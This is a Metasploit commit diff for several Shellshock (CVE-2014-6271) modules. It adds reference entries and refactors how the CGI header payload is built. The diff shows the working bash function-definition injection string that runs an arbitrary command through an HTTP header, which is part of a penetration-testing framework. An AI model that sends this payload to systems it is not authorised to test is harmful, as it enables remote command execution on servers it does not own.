Land rapid7#3912 - Update check method and additional references

Author: wchen-r7

modules/auxiliary/scanner/http/apache_mod_cgi_bash_env.rb

@@ -29,6 +29,8 @@ def initialize(info = {})
       ],
       'References' => [
         ['CVE', '2014-6271'],
+        ['OSVDB', '112004'],
+        ['EDB', '34765'],
         ['URL', 'https://access.redhat.com/articles/1200223'],
         ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
       ],
@@ -43,14 +45,12 @@ def initialize(info = {})
       OptString.new('CMD', [true, 'Command to run (absolute paths required)',
         '/usr/bin/id'])
     ], self.class)
-
-    @marker = marker
   end
 
   def check_host(ip)
-    res = req("echo #{@marker}")
+    res = req("echo #{marker}")
 
-    if res && res.body.include?(@marker * 3)
+    if res && res.body.include?(marker * 3)
       report_vuln(
         :host => ip,
         :port => rport,
@@ -83,7 +83,7 @@ def run_host(ip)
 
     res = req(datastore['CMD'])
 
-    if res && res.body =~ /#{@marker}(.+)#{@marker}/m
+    if res && res.body =~ /#{marker}(.+)#{marker}/m
       print_good("#{peer} - #{$1}")
       report_vuln(
         :host => ip,
@@ -99,13 +99,17 @@ def req(cmd)
       'method' => datastore['METHOD'],
       'uri' => normalize_uri(target_uri.path),
       'headers' => {
-        datastore['HEADER'] => "() { :;};echo #{@marker}$(#{cmd})#{@marker}"
+        datastore['HEADER'] => sploit(cmd)
       }
     )
   end
 
+  def sploit(cmd)
+    %Q{() { :;};echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"}
+  end
+
   def marker
-    Rex::Text.rand_text_alphanumeric(rand(42) + 1)
+    @marker ||= Rex::Text.rand_text_alphanumeric(rand(42) + 1)
   end
 
 end

modules/auxiliary/server/dhclient_bash_env.rb

@@ -37,6 +37,8 @@ def initialize
       'References' => [
         ['CVE', '2014-6271'],
         ['CWE', '94'],
+        ['OSVDB', '112004'],
+        ['EDB', '34765'],
         ['URL', 'https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/'],
         ['URL', 'http://seclists.org/oss-sec/2014/q3/649',],
         ['URL', 'https://www.trustedsec.com/september-2014/shellshock-dhcp-rce-proof-concept/',]

modules/exploits/multi/http/apache_mod_cgi_bash_env_exec.rb

@@ -26,6 +26,8 @@ def initialize(info = {})
       ],
       'References' => [
         ['CVE', '2014-6271'],
+        ['OSVDB', '112004'],
+        ['EDB', '34765'],
         ['URL', 'https://access.redhat.com/articles/1200223'],
         ['URL', 'http://seclists.org/oss-sec/2014/q3/649']
       ],
@@ -119,11 +121,15 @@ def req(cmd)
         'method' => datastore['METHOD'],
         'uri' => normalize_uri(target_uri.path.to_s),
         'headers' => {
-          datastore['HEADER'] => "() { :;};echo #{marker}$(#{cmd})#{marker}"
+          datastore['HEADER'] => sploit(cmd)
         }
       }, datastore['TIMEOUT'])
   end
 
+  def sploit(cmd)
+    %Q{() { :;};echo -e "\\r\\n#{marker}$(#{cmd})#{marker}"}
+  end
+
   def marker
     @marker ||= rand_text_alphanumeric(rand(42) + 1)
   end

modules/exploits/osx/local/vmware_bash_function_root.rb

@@ -30,7 +30,9 @@ def initialize(info={})
         ],
       'References'    =>
         [
-          [ 'CVE', '2014-6271' ]
+          [ 'CVE', '2014-6271' ],
+          [ 'OSVDB', '112004' ],
+          [ 'EDB', '34765' ]
         ],
       'Platform'      => 'osx',
       'Arch'          => [ ARCH_X86_64 ],

modules/exploits/unix/dhcp/bash_environment.rb

@@ -37,7 +37,9 @@ def initialize(info = {})
       'Arch'           => ARCH_CMD,
       'References'     =>
         [
-          ['CVE', '2014-6271']
+          ['CVE', '2014-6271'],
+          ['OSVDB', '112004'],
+          ['EDB', '34765']
         ],
       'Payload'        =>
         {